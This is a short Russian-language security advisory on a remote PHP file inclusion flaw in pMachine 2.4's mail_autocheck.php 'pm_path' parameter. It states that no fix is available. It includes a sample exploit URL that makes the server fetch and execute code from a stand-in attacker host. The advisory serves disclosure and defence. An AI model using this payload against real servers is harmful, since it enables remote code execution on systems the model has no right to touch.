PHP-инклюдинг в pMachine

Дата публикации:
21.02.2005
Дата изменения:
16.10.2006
Всего просмотров:
2428
Опасность:
Высокая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:

Уязвимые версии: pMachine 2.4

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный php-сценарий на уязвимой системе.

Уязвимость существует в параметре 'pm/add_ons/mail_this_entry/mail_autocheck.php' из-за некорректной фильтрации данных в параметре 'pm_path'. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный PHP сценарий с привилегиями web-сервера. Пример:

http://[target]/pMachine/pm/add_ons/mail_this_entry/ mail_autocheck.php?pm_path=http://[attacker]/malicious-code.php?

URL производителя: http://www.pmachine.com

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: pMachine Pro / pMachine Free Remote Code Execution

или введите имя

CAPTCHA